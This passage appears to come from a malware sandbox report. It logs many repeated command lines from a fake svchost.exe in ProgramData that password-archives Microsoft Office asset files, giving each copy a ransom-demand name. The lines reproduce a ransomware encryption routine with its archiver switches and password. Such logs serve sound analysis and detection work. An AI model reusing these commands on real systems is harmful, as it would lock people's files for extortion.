  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1312
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3380
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag-dark.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag-dark.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2648
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4116
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4080
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2748
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4752
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4688
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1128
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5584
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\CardViewIcon.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\CardViewIcon.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.White.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.White.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1816
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4608
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.GrayF.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.GrayF.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2508
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:5640
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Checkmark.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Checkmark.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Checkmark.White.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Checkmark.White.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected](!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
